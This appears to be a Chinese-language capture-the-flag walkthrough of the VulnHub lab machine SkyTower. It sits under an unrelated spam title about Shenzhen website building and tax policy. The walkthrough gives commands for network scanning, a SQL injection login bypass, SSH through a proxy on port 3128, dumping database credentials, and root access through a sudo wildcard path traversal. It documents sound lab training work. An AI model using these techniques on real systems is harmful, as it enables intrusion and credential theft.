深圳网站营销型建设企业所得税优惠政策最新2023上海

一、安装配置靶机

下载地址:

SkyTower: 1 ~ VulnHub

下载之后解压发现是VirtualBox格式的

我们下载一个VirtualBox，这是官网

Downloads – Oracle VirtualBox

安装到默认路径就

打开后点击注册

选择解压后的vbox文件

然后点击左上角管理

点击导出虚拟电脑，选中后下一步更改路径，然后一直下一步

就得到了一个镜像文件

用vmware打开

默认网卡模式为仅主机，更改为NAT模式

C段扫描获得IP

arp-scan -l

端口扫描一下发现22，80，3128

nmap 192.168.230.128

访问一下80端口

发现一个登录框

发现登录框，我们测sql注入

邮箱随便输入一个，密码我们输入

123' 1=1#

登录成功发现账号密码

想到远程连接22端口

发现无效

想到3128端口尝试挂上代理连接

vim /etc/proxychains4.conf

proxychains ssh john@192.168.230.128 -t "/bin/sh"

登录成功

开始提权

sudo -l

发现没有可以提权的

想到了80端口界面存在sql注入

cat /var/www/login.php

发现数据库信息

登录成功

mysql -u root SkyTech -p

查看数据库信息

show databases；

逐个查看找到

use SkyTech;
show tables;

得到账号密码

select * from login

ssh登录

proxychains ssh sara@192.168.230.128 -t "/bin/sh"

sudo -l

得到/accounts/*有权限

pwd

发现在根目录下

sudo ls /accounts/../root

查看一下

sudo cat /accounts/../root/flag.txt

得到root密码

远程连接提权成功

proxychains ssh root@192.168.230.128 -t "/bin/sh"